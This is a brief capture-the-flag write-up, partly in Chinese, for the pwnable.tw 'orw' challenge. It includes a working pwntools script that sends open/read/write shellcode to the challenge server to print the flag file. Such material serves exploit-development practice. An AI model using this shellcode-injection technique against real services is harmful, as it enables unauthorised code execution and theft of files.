Pwnable.tw orw Writeup

10 November 2024 1 min read Updated:25 August 2025

Pwnable.tw orw Writeup

Not in series

題目

簡介

Read the flag from /home/orw/flag.
Only open read write syscall are allowed to use.

題解

總之就是你丟什麼他就執行什麼
但是只能用 read/write/open

Exploit

from pwn import *
context.arch = "i386"
r = remote("chall.pwnable.tw", 10001)
 
# 使用 shellcraft 生成 shellcode
# 讀取並輸出 50 個 byte
sc = asm(
    shellcraft.i386.linux.open(b'/home/orw/flag') +
    shellcraft.i386.linux.read('eax', 'esp', 50) +
    shellcraft.i386.linux.write('1', 'esp', 50)
)
 
r.sendlineafter(b':', sc)
print(r.recvuntil(b'}'))
 
r.interactive()